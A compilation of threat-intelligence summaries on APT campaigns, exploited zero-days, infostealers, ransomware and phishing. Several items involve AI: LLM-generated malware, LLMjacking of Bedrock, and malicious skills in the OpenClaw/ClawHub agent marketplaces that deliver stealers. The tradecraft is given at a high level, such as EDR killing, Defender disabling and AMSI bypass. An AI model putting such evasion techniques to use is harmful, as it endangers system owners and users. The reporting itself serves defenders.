UNC6201, a suspected PRC-nexus threat group, has been exploiting a zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since mid-2024. The group uses this flaw for lateral movement, persistent access, and deployment of malware including SLAYSTYLE, BRICKSTORM, and a new backdoor called GRIMBOLT. GRIMBOLT, written in C# and compiled using native AOT, represents a shift in tradecraft designed to complicate analysis and improve performance. The actors also employed novel tactics to pivot into VMware infrastructure, including 'Ghost NICs' creation and iptables for Single Packet Authorization. Dell has released patches for the vulnerability, and the post provides detailed technical analysis, detection opportunities, and hardening guidance.

A sophisticated spam campaign exploited Atlassian Jira Cloud to bypass security controls and target government and corporate entities. The attackers used legitimate Atlassian Cloud infrastructure to create disposable Jira instances, leveraging the platform's trusted domain reputation. The campaign targeted specific language groups, including English, French, German, Italian, Portuguese, and Russian speakers, with tailored emails redirecting to investment scams and online casinos. The operation demonstrated high automation and abuse of SaaS workflows, highlighting the need for reassessing trust assumptions in cloud-generated emails. The campaign utilized Keitaro Traffic Distribution System for redirects and focused on organizations already using Atlassian Jira, exploiting their familiarity with Jira-related emails.

Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile are being actively exploited, allowing unauthenticated remote code execution on servers. Widespread exploitation has been observed, including reverse shells, web shells, reconnaissance, and malware downloads. Affected sectors include government, healthcare, manufacturing, and technology in multiple countries. Over 4,400 vulnerable instances have been identified. Attackers are moving quickly from initial access to deploying persistent backdoors. Immediate patching is strongly recommended, as exploitation attempts are largely automated and opportunistic.

A Chinese-speaking cybercrime group, REF4033, has orchestrated a massive SEO poisoning campaign, compromising over 1,800 Windows web servers worldwide using the BADIIS malware. The campaign operates in two phases: serving keyword-stuffed HTML to search engine crawlers and redirecting victims to illicit websites. The group deploys BADIIS, a malicious IIS module, to hijack legitimate servers for manipulating search engine rankings and facilitating financial fraud. The campaign primarily targets the APAC region, with China and Vietnam accounting for 82% of compromised servers. Victims span various sectors, including government agencies, educational institutions, and financial services. The attackers use sophisticated techniques for stealth and anti-tampering, employing Chinese encryption standards and commercial obfuscation tools.

This analysis examines a sophisticated attack chain targeting Windows systems through social engineering. It uses fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands. The multi-stage infection process ultimately deploys the StealC information stealer, a commodity malware designed to harvest sensitive data. The attack chain includes PowerShell scripts, position-independent shellcode, and a PE downloader, utilizing techniques like reflective PE loading, API hashing, and process injection to evade detection. StealC's capabilities include stealing browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, and system information. The malware uses encrypted C2 communication and operates without persistence, making it particularly stealthy.

A new Android backdoor called Keenadu has been discovered embedded in the firmware of several tablet brands. It infects the libandroid_runtime.so library during firmware building, injecting itself into every app launched on the device. Keenadu provides attackers unrestricted control over victims' devices, primarily for ad fraud purposes. The investigation revealed connections between Keenadu and other major Android botnets like Triada, BADBOX, and Vo1d. The malware was found in system apps, Google Play apps, and modified versions of popular apps. Over 13,000 users worldwide have been affected, with Russia, Japan, Germany, Brazil and the Netherlands seeing the highest number of infections.

A state-sponsored threat group known as Lotus Blossom compromised the official hosting infrastructure for Notepad++ between June and December 2025. The attackers hijacked traffic to the update server, allowing them to selectively target specific users, primarily in Southeast Asia across government, telecommunications and critical infrastructure sectors. Two infection chains were identified - one using Lua script injection to deliver Cobalt Strike and another using DLL side-loading to deploy a Chrysalis backdoor. The campaign affected additional sectors in South America, US, Europe and Southeast Asia including cloud hosting, energy, financial, government, manufacturing and software development. The sophisticated supply chain attack leveraged insufficient verification controls in older versions of the Notepad++ updater.

A coordinated campaign of Chrome extensions posing as AI assistants has been uncovered, affecting over 260,000 users. These extensions, while appearing legitimate, embed remote, server-controlled interfaces inside extension-controlled surfaces, granting access to sensitive browser capabilities. The campaign consists of 30 different extensions sharing the same codebase, permissions, and backend infrastructure. Key features include remote iframe as the core UI, page content extraction, voice recognition capability, and Gmail integration. The extensions communicate with infrastructure under the tapnetic.pro domain, using subdomain segmentation for logical separation. The campaign employs extension spraying tactics to evade takedowns and quickly restore distribution. This approach breaks the browser security model, potentially allowing data harvesting and user behavior monitoring.

Operation MacroMaze, attributed to APT28 (Fancy Bear), targets entities in Western and Central Europe from September 2025 to January 2026. The campaign utilizes basic tools and legitimate services for infrastructure and data exfiltration. Multiple documents with varying macro variants act as droppers, establishing a foothold by creating files in the %USERPROFILE% folder. The attack chain involves VBScript execution, scheduled task creation for persistence, and a multi-stage process using batch files. Exfiltration is achieved through HTML-based techniques, leveraging webhook.site for data transmission. Despite its simplicity, the campaign demonstrates effective operational tradeoffs, making detection and attribution challenging.

A malicious campaign exploiting Google Groups to distribute Lumma Stealer and Ninja Browser malware has been uncovered. The attackers infiltrate industry-related forums, posting seemingly legitimate technical discussions with embedded malicious download links. For Windows users, the payload is Lumma Stealer, a credential-harvesting malware. Linux users are directed to download a trojanized Chromium-based browser called Ninja Browser, which installs malicious extensions and persistence mechanisms. The campaign utilizes Google's trusted ecosystem to bypass security measures and increase user confidence. Over 4,000 malicious Google Groups and 3,500 Google-hosted URLs have been identified in this global operation, posing significant risks to organizations including credential theft, account takeover, and remote command execution.

This article explores the misuse of QR codes in phishing attacks, focusing on three key areas: QR codes with URL shorteners concealing malicious destinations, in-app deep links used to steal credentials and control victims' apps, and QR codes bypassing app store security via direct malicious app downloads. The research reveals an average of 11,000 daily detections of malicious QR codes, with financial services being the most targeted industry. Attackers are leveraging QR code shorteners, in-app deep links, and direct downloads to evade security controls and exploit users' trust in QR codes. The article highlights specific attack scenarios, including account takeovers through messaging apps and distribution of suspicious gambling apps.

Netskope Threat Labs has identified multiple phishing campaigns exploiting video conference invitations from Zoom, Microsoft Teams, and Google Meet. The attackers use fake meeting invites to trick users into downloading malicious payloads disguised as software updates. These payloads are actually legitimate, digitally signed remote monitoring and management (RMM) tools like Datto RMM, LogMeIn, or ScreenConnect. By leveraging these tools, attackers gain administrative remote access to victims' machines, potentially leading to data theft or further malware deployment. The campaigns use convincing phishing pages that mimic legitimate video conferencing platforms, exploiting users' urgency to join scheduled calls. This sophisticated approach allows attackers to bypass traditional security measures and establish a persistent foothold in corporate networks.

A critical vulnerability in React Server Components, dubbed React2Shell, was disclosed on December 3, 2025. Within days, multiple threat actors exploited this flaw, leading to simultaneous compromises of affected systems. The case study reveals a rapid progression from initial coin miner installations to the deployment of various malware types, including RATs and backdoors. The timeline shows attacks beginning on December 5, with website defacement occurring by December 7. Notably, the incident involved the use of SNOWLIGHT, HISONIC backdoor, CrossC2 RAT, and the abuse of Global Socket tool. The study emphasizes the speed at which attackers exploit new vulnerabilities and the importance of swift patching and thorough post-compromise investigations.

LockBit 5.0, the latest version of the notorious ransomware, has been released with support for Windows, Linux, and ESXi systems. This update brings improved defense evasion, faster encryption, and enhanced modularity. The Windows variant employs extensive anti-analysis techniques, while Linux and ESXi versions remain unpacked. All variants share a common encryption scheme using XChaCha20 and Curve25519. LockBit 5.0 demonstrates a focus on enterprise and infrastructure targets, including explicit support for Proxmox virtualization. The group's data leak site reveals a primary focus on the U.S. business sector, with victims spanning various industries. LockBit's infrastructure has shown connections to SmokeLoader, suggesting possible cooperation or infrastructure reuse among malware operators.

An attack campaign targeting organizations in the US, Canada, UK, and Northern Ireland exploits ConnectWise ScreenConnect vulnerabilities. The attack chain begins with a spoofed email containing a malicious .cmd attachment, which executes silently, escalates privileges, disables Windows SmartScreen, and removes the Mark-of-the-Web. It then installs a legitimate Remote Monitoring and Management tool, ScreenConnect, which is abused as a Remote Access Trojan for persistent command-and-control access. The campaign focuses on sectors with high-value data, including government, healthcare, and logistics. The attackers use various techniques to evade detection, including UAC bypass, registry modification, and silent MSI installation. The ScreenConnect client used has a revoked certificate, highlighting the importance of blocking vulnerable software versions and enforcing strict RMM allowlists.

Threat actors have been observed exploiting Net Monitor for Employees Professional and SimpleHelp software in ransomware operations. These legitimate tools were used for remote access, command execution, and persistence. The attackers disguised Net Monitor as Microsoft OneDrive and configured SimpleHelp with cryptocurrency-related keyword triggers. In one case, the attack led to an attempted deployment of Crazy ransomware. The intrusions involved initial access through compromised VPN accounts, followed by the installation of these tools for remote control and monitoring. The shared infrastructure and tactics suggest a single threat actor or group behind these activities, with objectives including cryptocurrency theft and ransomware deployment.

A convincing lookalike of the popular 7-Zip archiver site has been serving a trojanized installer that silently converts victims' machines into residential proxy nodes. The fake site, 7zip[.]com, distributes a functional copy of 7-Zip alongside concealed malware. The malware deploys three components: Uphero.exe (service manager), hero.exe (proxy payload), and hero.dll (supporting library). It establishes persistence through Windows services, manipulates firewall rules, and profiles the host system. The primary function is to enroll infected hosts as residential proxy nodes, allowing third parties to route traffic through victims' IP addresses. This campaign appears to be part of a broader operation with similar tactics used for other fake installers. The malware incorporates multiple evasion techniques and uses encrypted communications.

Between June and December 2025, state-sponsored threat group Lotus Blossom compromised the hosting infrastructure for Notepad++, allowing them to intercept and redirect update traffic. This enabled selective targeting of users primarily in Southeast Asian government, telecommunications and critical infrastructure sectors. Two infection chains were identified - one using Lua script injection to deliver Cobalt Strike and another using DLL side-loading for a Chrysalis backdoor. The campaign affected additional sectors across South America, US, Europe and Southeast Asia including cloud hosting, energy, financial, government, manufacturing and software development. The attack exploited insufficient verification in older versions of the Notepad++ updater to serve malicious installers to targeted victims.

A widespread campaign is distributing the RenEngine loader malware disguised as pirated games and software. The loader uses a modified Ren'Py game engine to deliver payloads like Lumma and ACR stealers. It employs sophisticated techniques including sandbox evasion, process injection, and modular design. The infection chain involves decrypting and launching malicious code through legitimate applications. RenEngine has affected users globally, with Russia, Brazil, Turkey, Spain and Germany most impacted. The campaign highlights risks of pirated software and the need for robust security measures.

Unit 42 discovered a rogue virtual machine used by the cybercrime group Muddled Libra during an incident response investigation. The VM provided insights into the group's operational methods, including reconnaissance, tool downloads, persistence establishment, certificate theft, and interactions with the target's infrastructure. Muddled Libra created the VM after gaining unauthorized access to the target's VMware vSphere environment. The group's tactics involve minimal malware use, preferring to leverage the target's assets. Their attack chain included creating a VM, downloading tools, establishing C2, using stolen certificates, and attempting data exfiltration. The article details the group's activities, tools used, and troubleshooting efforts during the attack.

A sophisticated phishing campaign delivering XWorm RAT has been identified. The attack chain begins with themed emails containing malicious Excel attachments exploiting CVE-2018-0802. When opened, the file downloads an HTA file, which executes PowerShell code to retrieve a fileless .NET module. This module then uses process hollowing to inject the XWorm payload into Msbuild.exe. XWorm 7.2 employs encrypted C2 communication and offers extensive features through plugins, including system control, data theft, DDoS capabilities, and ransomware functionality. The analysis reveals XWorm's modular architecture and advanced evasion techniques, highlighting it as a significant threat.

Darktrace identified an AI-generated malware sample exploiting the React2Shell vulnerability in its honeypot environment. The incident demonstrates how LLM-assisted development enables low-skill attackers to rapidly create effective exploitation tools. The attack chain involved spawning a container named 'python-metrics-collector' on an exposed Docker daemon, downloading and executing a Python script, and deploying a XMRig crypto miner. The malware sample featured thorough code documentation and lacked typical obfuscation, indicating AI generation. This highlights the growing trend of AI-enabled cyber threats that are now operational and accessible to anyone, posing new challenges for defenders.

VoidLink is a Linux C2 framework that generates implant binaries for cloud and enterprise environments. The implant, likely built using an LLM coding agent, demonstrates advanced capabilities including multi-cloud targeting, container awareness, and kernel-level stealth. It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials and detecting container runtimes. The malware includes plugins for container escape and Kubernetes privilege escalation, as well as a kernel-level rootkit that adapts its approach based on the host's kernel version. C2 communications use AES-256-GCM over HTTPS, disguised as normal web traffic. VoidLink highlights the growing concern of LLM-generated implants reducing the skill barrier for producing sophisticated malware.

A critical vulnerability in SmarterMail email server software (CVE-2026-23760) is being actively exploited by the China-based threat actor Storm-2603. The group uses this vulnerability to bypass authentication, reset administrator passwords, and gain full system control through the software's 'Volume Mount' feature. They then install Velociraptor, a legitimate digital forensics tool, to maintain access and prepare for deploying their Warlock ransomware. The attack chain involves exploiting the password reset API, abusing administrative features, and using legitimate tools to blend in with normal activity. This sophisticated approach allows the group to bypass detection mechanisms and establish persistence. The report also notes simultaneous exploitation attempts of another vulnerability (CVE-2026-24423) against the same targets, highlighting the urgent need for patching and improved security measures.

An investigation using Silent Push's Traffic Origin and residential proxy data revealed a suspicious Chinese VPN provider. The analysis focused on IP address 205.198.91.155, which showed unusual traffic from Russia, China, Myanmar, Iran, and Venezuela. This IP was linked to the domain lvcha.in, hosting a Chinese-language VPN. Further investigation uncovered nearly 50 related domains promoting the same VPN, suggesting attempts to bypass country-level firewalls. The VPN's infrastructure was found to use residential proxies and had connections to various high-risk countries. This case study demonstrates the importance of verifying physical and technical behaviors of connections to protect against fraud and state-sponsored actors using stolen identities and spoofed locations.

North Korean threat actor UNC1069 has evolved its tactics to target the cryptocurrency and decentralized finance sectors. In a recent intrusion, they deployed seven unique malware families, including new tools SILENCELIFT, DEEPBREATH, and CHROMEPUSH, designed to capture host and victim data. The attack utilized social engineering involving a compromised Telegram account, fake Zoom meeting, and reported AI-generated video. UNC1069 has shifted from spear-phishing to targeting Web3 industry entities like centralized exchanges, software developers, and venture capital firms. The intrusion demonstrated sophisticated techniques to bypass macOS security features and harvest credentials, browser data, and cryptocurrency information. This marks a significant expansion in UNC1069's capabilities and highlights their focus on financial theft and fueling future social engineering campaigns.

GuLoader, a malware downloader active since 2019, primarily delivers RATs and information stealers. It employs sophisticated anti-analysis techniques, including polymorphic code for dynamic constant construction and complex exception-based control flow obfuscation. The malware has evolved to handle multiple exception types, making tracing its execution flow challenging. GuLoader uses dynamic hashing, encrypted strings, and stack-based string encryption to conceal critical information. It often hosts payloads on trusted cloud services to bypass reputation-based detection. The malware's consistent development and updating of anti-analysis techniques suggest it will remain a significant threat in the future.

A recent supply chain attack targeting EmEditor users has been uncovered, involving watering hole tactics. The investigation reveals multiple domains masquerading as EmEditor-related sites, all registered through NameSilo LLC in December 2025. The domains resolve to various IP addresses, with some changes observed in February 2026. Additional domains with similar patterns were discovered, along with peculiar HTTP header behavior. A potential early stage of the campaign was identified, sharing similar characteristics with the initial report. The attackers continued their activities even after exposure, utilizing PowerShell scripts and various domains for command and control purposes. The analysis provides a comprehensive list of indicators, including domain names, IP addresses, and file hashes associated with the attack.

A recent investigation reveals that the APT-C-28 (ScarCruft) group has expanded its targets to include the cryptocurrency industry. The group employs sophisticated phishing tactics, using LNK files disguised as PDFs to lure victims with investment proposals ranging from $1-3 million. Upon execution, a multi-stage payload deployment occurs, ultimately installing MiradorShell v2.0 to gain system control. The attack chain involves file downloads, decryption, and the creation of scheduled tasks for persistence. MiradorShell, an AutoIt-based backdoor, connects to a command and control server, offering reverse shell capabilities, file management, remote program execution, and victim fingerprinting. The malware employs various evasion techniques, including inline library files and direct API calls.

eSentire's Threat Response Unit detected Prometei botnet activity on a customer's Windows Server in the Construction industry. Prometei, a Russian-origin botnet active since 2016, features remote control, credential harvesting, crypto-mining, lateral movement, and C2 communication over clearweb and TOR. The malware uses complex encryption, including rolling XOR and RC4, for payload decryption and C2 communications. It establishes persistence as a Windows service, creates firewall exceptions, and downloads additional modules for specialized functions like credential theft and TOR routing. The attack likely began with compromised RDP credentials, followed by the execution of a malicious command to download and run the Prometei payload.

Threat actors are actively exploiting a vulnerability in SolarWinds Web Help Desk, targeting organizations using versions prior to 12.8.7 HF1. The attack chain involves deploying Zoho ManageEngine RMM agents, Velociraptor for command and control, and Cloudflare tunnels for persistence. Attackers use encoded PowerShell commands, disable Windows Defender and Firewall, and implement a C2 failover mechanism. They also utilize Elastic Cloud for data exfiltration and QEMU for SSH backdoor persistence. The earliest known instance of this persistence mechanism was observed on January 16, 2026. Organizations are advised to update their SolarWinds Web Help Desk, restrict administrative interface access, reset credentials, and review hosts for unauthorized tools and suspicious activities.

Stan Ghouls, a cybercriminal group also known as Bloody Wolf, has been conducting targeted attacks against organizations in Russia, Uzbekistan, and other Central Asian countries since 2023. Their latest campaign primarily focused on Uzbekistan, with about 50 victims identified, along with 10 in Russia and a few others in neighboring countries. The attackers use spear-phishing emails with malicious PDF attachments to deliver a Java-based loader, which then installs the NetSupport remote access tool. The group targets manufacturing, finance, and IT sectors, possibly for financial gain and espionage. New evidence suggests Stan Ghouls may be expanding into IoT-based threats, as Mirai malware files were found on a server linked to their previous campaigns.

A recent Black Basta ransomware campaign incorporated a bring-your-own-vulnerable-driver (BYOVD) defense evasion component within the payload itself, a departure from typical practices. The ransomware exploited a vulnerable NsecSoft NSecKrnl driver to terminate security processes. This approach, previously seen in Ryuk and Obscura attacks, may indicate a trend towards bundling additional capabilities in ransomware payloads. The attack also involved a long dwell time and post-deployment activity using GotoHTTP. The Cardinal group, responsible for Black Basta, had been quiet following a chat log leak in 2025 but appears to be resuming activities. This development raises questions about future ransomware tactics and the potential advantages of embedding defense evasion capabilities within payloads.

This investigation reveals a new cyberespionage group tracked as TGR-STA-1030, believed to be a state-aligned actor operating from Asia. Over the past year, the group has compromised government and critical infrastructure organizations in 37 countries, targeting ministries, law enforcement agencies, and departments related to economic, trade, and diplomatic functions. The group employs sophisticated phishing and exploitation techniques, leveraging various tools and infrastructure to maintain persistent access. Their activities span across the Americas, Europe, Asia, Oceania, and Africa, with a focus on countries exploring certain economic partnerships. The group's operations often coincide with significant geopolitical events and economic interests, particularly in sectors like rare earth minerals and international trade agreements.

Cisco Talos uncovered 'DKnife', a sophisticated gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants. Used since 2019, DKnife performs deep-packet inspection, traffic manipulation, and malware delivery via routers and edge devices. It targets various devices, including PCs, mobile devices, and IoT, delivering ShadowPad and DarkNimbus backdoors. The framework primarily targets Chinese-speaking users, with evidence suggesting China-nexus threat actors as operators. DKnife's capabilities include DNS hijacking, Android application update hijacking, Windows binary hijacking, anti-virus traffic disruption, and user activity monitoring. A link to the WizardNet campaign was also discovered, indicating a shared development or operational lineage.

Marco Stealer, discovered in June 2025, is an information stealer targeting browser data, cryptocurrency wallets, and sensitive files. It employs anti-analysis techniques, string encryption, and terminates security tools. The malware collects system information, exfiltrates browser data using embedded files, and extracts cryptocurrency wallet data from browser extensions. It also targets popular services and cloud storage. Marco Stealer uses AES-256 encryption for C2 communication over HTTP. Despite recent law enforcement actions against similar threats, information stealers continue to pose significant risks to corporate environments.

A new evolution in the ClickFix campaign, dubbed CrashFix, has been identified. This variant deliberately crashes victims' browsers and uses social engineering to lure users into executing malicious commands. The attack begins with a malicious ad redirecting users to install a harmful browser extension impersonating a legitimate ad blocker. The payload causes delayed browser issues and presents a fake security warning. It misuses the Windows utility finger.exe to execute malicious commands and downloads additional payloads, including a Python-based Remote Access Trojan (RAT). The RAT, named ModeloRAT, establishes persistence and performs extensive reconnaissance. The campaign targets domain-joined systems and employs multiple obfuscation techniques to evade detection.

In early February 2026, an intrusion was detected where threat actors exploited compromised SonicWall SSLVPN credentials for initial network access. The attackers deployed an EDR killer utilizing a legitimate but revoked EnCase forensic driver to terminate security processes from kernel mode. This technique, known as Bring Your Own Vulnerable Driver (BYOVD), bypasses Windows Driver Signature Enforcement. The attack was halted before ransomware deployment, but it highlights the growing trend of weaponizing signed, legitimate drivers to disable endpoint security. The intrusion involved aggressive network reconnaissance, deployment of a sophisticated EDR killer with an encoded kernel driver payload, and attempts to establish persistence. The case underscores the importance of multi-factor authentication, VPN log monitoring, and implementing Microsoft's recommended driver block rules.

A Chinese threat actor, Amaranth-Dragon, has been conducting highly targeted cyber-espionage campaigns against government and law enforcement agencies in Southeast Asia throughout 2025. The group swiftly exploited the CVE-2025-8088 vulnerability in WinRAR to deliver malicious payloads, including a custom loader and the Havoc C2 Framework. Their operations demonstrate sophisticated tactics, including geo-restricted command and control servers, use of legitimate hosting services, and a new Telegram-based remote access trojan. The campaigns coincide with significant local geopolitical events, increasing the likelihood of successful compromises. Technical analysis reveals similarities with APT-41, suggesting a possible connection or shared resources between the groups.

An AWS environment was targeted in a sophisticated attack, with the threat actor gaining administrative privileges in under 10 minutes. The operation showed signs of leveraging large language models for automation and decision-making. Initial access was obtained through credentials found in public S3 buckets, followed by rapid privilege escalation via Lambda function code injection. The attacker moved laterally across 19 AWS principals, abused Amazon Bedrock for LLMjacking, and launched GPU instances for potential model training. The attack involved extensive reconnaissance, data exfiltration, and attempts to establish persistence. Notable techniques included IP rotation, role chaining, and the use of AI-generated code.

Transparent Tribe, also known as APT36, has expanded its targeting to include India's startup ecosystem, particularly those in the cybersecurity domain. The group is using startup-oriented themed lure material delivered via ISO container-based files to deploy Crimson RAT. This campaign deviates from their typical government and defense targets, suggesting a shift in strategy towards companies providing open-source intelligence services and collaborating with law enforcement agencies. The attack chain involves spear-phishing emails, malicious LNK files, and batch scripts to execute the Crimson RAT payload. The malware employs extensive obfuscation techniques and uses a custom TCP protocol for command and control communications. This activity demonstrates the group's adaptation of proven tooling for new victim profiles while maintaining its core behavioral tactics, techniques, and procedures.

A shadow DNS network and HTTP-based traffic distribution system (TDS) hosted in Aeza International, a sanctioned bulletproof hosting company, has been discovered. The system compromises routers, altering their DNS settings to use shadow resolvers. These resolvers selectively modify responses, directing users to malicious content. The TDS incorporates a clever DNS trick to evade detection by security groups. The system, operational since mid-2022, appears to be run by a financially motivated actor in affiliate marketing. It has the potential to interfere with devices on the network, alter DNS records, and conduct adversary-in-the-middle operations. The threat actor's ability to control DNS resolution poses significant risks beyond delivering unwanted advertising.

A new hacking group called Punishing Owl has emerged, targeting Russian critical infrastructure. Their first attack on December 12, 2025, compromised a Russian state security agency, leaking internal documents. The group used DNS manipulation, created fake subdomains, and sent phishing emails to the victim's partners. They employed a PowerShell stealer called ZipWhisper to exfiltrate browser data. Punishing Owl's attacks are politically motivated and focus exclusively on Russian targets, including government agencies, scientific institutions, and IT organizations. The group has established a presence on cybercriminal forums and social media, likely operating from Kazakhstan. Experts predict this group will continue to be a persistent threat in the Russian cyberspace.

A major cybercriminal operation called Rublevka Team has generated over $10 million through cryptocurrency theft since 2023. The group employs a network of social engineering specialists who direct victims to malicious pages impersonating legitimate crypto services. Using custom JavaScript scripts, they trick users into connecting wallets and authorizing fraudulent transactions. Rublevka Team's infrastructure is fully automated, offering affiliates access to tools for launching high-volume scams. Their model poses a growing threat to cryptocurrency platforms and brands, with potential for reputational and legal risks. The group's agility in rotating domains and targeting lower-cost chains like Solana undermines traditional fraud detection efforts.

A massive malware campaign dubbed ClawHavoc has been uncovered in the ClawHub marketplace, targeting OpenClaw bots and their users. An AI bot named Alex, working with security researcher Oren Yomtov, discovered 341 malicious skills, including 335 from a single campaign. The malware, identified as Atomic Stealer (AMOS), uses sophisticated techniques to evade detection and steal sensitive data. The attack exploits users' trust in AI assistants, potentially compromising personal and financial information. In response, a new tool called Clawdex has been developed to help bots and users scan for malicious skills before installation.

DragonForce, a ransomware group that emerged in late 2023, has become a significant cyber threat. They employ a dual-extortion strategy, encrypting and exfiltrating data, and have targeted various sectors, particularly manufacturing and construction. The group offers a flexible ransomware-as-a-service platform with advanced features, supporting multiple platforms and encryption modes. DragonForce has announced a shift to a cartel model, allowing affiliates to create their own brands. They've also introduced automated registration for new affiliates and a 'Company Data Audit' service to enhance extortion campaigns. The group has engaged in conflicts with rival ransomware operations and claims to have formed a coalition with other major groups. While their connection to DragonForce Malaysia remains unsubstantiated, technical analysis reveals similarities with other ransomware families and sophisticated attack techniques.

Almost 400 fake crypto trading add-ons in the Moltbot/OpenClaw AI assistant project have been discovered, potentially leading users to install information-stealing malware. These add-ons, known as skills, masquerade as cryptocurrency trading automation tools and target various platforms. The malicious skills share the same command-and-control infrastructure and use social engineering to convince users to execute commands that steal crypto assets. The supply chain attack relies on social engineering and lacks security review in the skills publication process. Security experts warn about the inherent risks of endpoint-native AI agents and emphasize the need for proper security controls and architectural design considerations.

A vulnerability in React Native's Metro Server, dubbed Metro4Shell, has been exploited in the wild since December 21, 2025. The flaw allows unauthenticated remote attackers to execute arbitrary OS commands on Windows systems. Exploitation involves a multi-stage PowerShell-based loader delivered through cmd.exe, which disables Microsoft Defender, establishes a connection to an attacker-controlled host, and executes a downloaded binary. The attacks originated from multiple IP addresses and targeted both Windows and Linux systems. Despite ongoing exploitation, the vulnerability has not received widespread public acknowledgment, highlighting the gap between actual threats and recognized risks in cybersecurity.

A critical vulnerability in React Native's Metro development server is being actively exploited to deliver malware to Windows and Linux machines. The flaw, tracked as CVE-2025-11953, allows unauthenticated attackers to execute arbitrary commands through OS command injection. Researchers discovered exploitation attempts as early as December, with attacks disabling Microsoft Defender protections and delivering a Rust-based payload with anti-analysis features. Despite its severity and ongoing exploitation, the vulnerability has not received widespread public acknowledgment. The bug affects the React Native Community command line tool, a popular npm package with millions of weekly downloads, highlighting the potential impact on developer tooling and the need for increased awareness and security measures.

The article details a sophisticated supply chain attack on Notepad++ that occurred from July to October 2025. Attackers compromised the update infrastructure, deploying various malicious payloads through three distinct infection chains. The attack targeted individuals and organizations in Vietnam, El Salvador, Australia, and the Philippines. The infection methods evolved over time, using NSIS installers, Metasploit downloaders, and Cobalt Strike Beacons. The attackers employed clever techniques to evade detection, including the abuse of legitimate software and the use of multiple C2 servers. The article provides a comprehensive timeline of the attack, describes the different execution chains, and offers guidance on detecting traces of the attack.

Rapid7 Labs has uncovered a sophisticated campaign attributed to the Chinese APT group Lotus Blossom, involving a new custom backdoor named Chrysalis. The attack compromised Notepad++ infrastructure to deliver the backdoor. Analysis revealed multiple custom loaders, including one using Microsoft Warbird for obfuscation. The Chrysalis backdoor has extensive capabilities for information gathering, file operations, and remote command execution. Additional artifacts found include Cobalt Strike beacons and Metasploit payloads. The campaign shows Lotus Blossom evolving its tactics, mixing custom and off-the-shelf tools with advanced obfuscation techniques to evade detection.

Infostealer threats are expanding beyond Windows, targeting macOS and leveraging cross-platform languages like Python. Recent campaigns use social engineering to deploy macOS-specific infostealers such as DigitStealer, MacSync, and AMOS. These stealers use fileless execution and native macOS utilities to harvest credentials and sensitive data. Python-based stealers are also on the rise, allowing attackers to quickly adapt and target diverse environments. Additionally, threat actors are abusing trusted platforms like WhatsApp and PDF converter tools to distribute malware such as Eternidade Stealer. These evolving threats blend into legitimate ecosystems and evade conventional defenses, posing significant risks to organizations across various operating systems and delivery channels.

A new campaign dubbed Operation Neusploit, attributed to the Russia-linked APT28 group, targets Central and Eastern European countries using specially crafted Microsoft RTF files to exploit CVE-2026-21509. The attack chain involves multi-stage infection, delivering malicious backdoors including MiniDoor, PixyNetLoader, and a Covenant Grunt implant. The campaign employs social engineering lures in multiple languages, server-side evasion techniques, and abuses the Filen API for command-and-control communications. The malware components utilize various persistence mechanisms, steganography, and anti-analysis techniques. The operation showcases APT28's evolving tactics, techniques, and procedures in weaponizing the latest vulnerabilities.

A sophisticated phishing campaign has been detected that utilizes a multi-stage approach to evade detection. The attack begins with a procurement-themed email containing a PDF attachment. This PDF redirects victims to another PDF hosted on trusted cloud storage, which then leads to a fake Dropbox login page. The attackers exploit trusted platforms and harmless file formats to bypass security measures. The campaign uses social engineering tactics to harvest credentials, which are then exfiltrated to attacker-controlled infrastructure via Telegram. This method proves effective by leveraging legitimate business processes, trusted file types, and reputable cloud services to appear authentic and bypass automated security checks.

A Microsoft Teams voice-phishing campaign leveraging Quick Assist, a remote administration tool, was tracked in September 2025. The campaign uses help desk scams to gain initial access, followed by user group enumeration and the execution of a PowerShell script to download a command and control payload. The attack employs AMSI bypass, encrypted communications, and a web-socket remote access trojan. Multiple Microsoft 365 tenants with IT-related subdomains were used, along with various IPs and domains for C2 infrastructure. The campaign shows similarities to Storm-1811 and PhantomCaptcha activities, suggesting a complex cybercrime ecosystem. The attackers' ultimate goal may be ransomware deployment, although observed attempts were successfully blocked.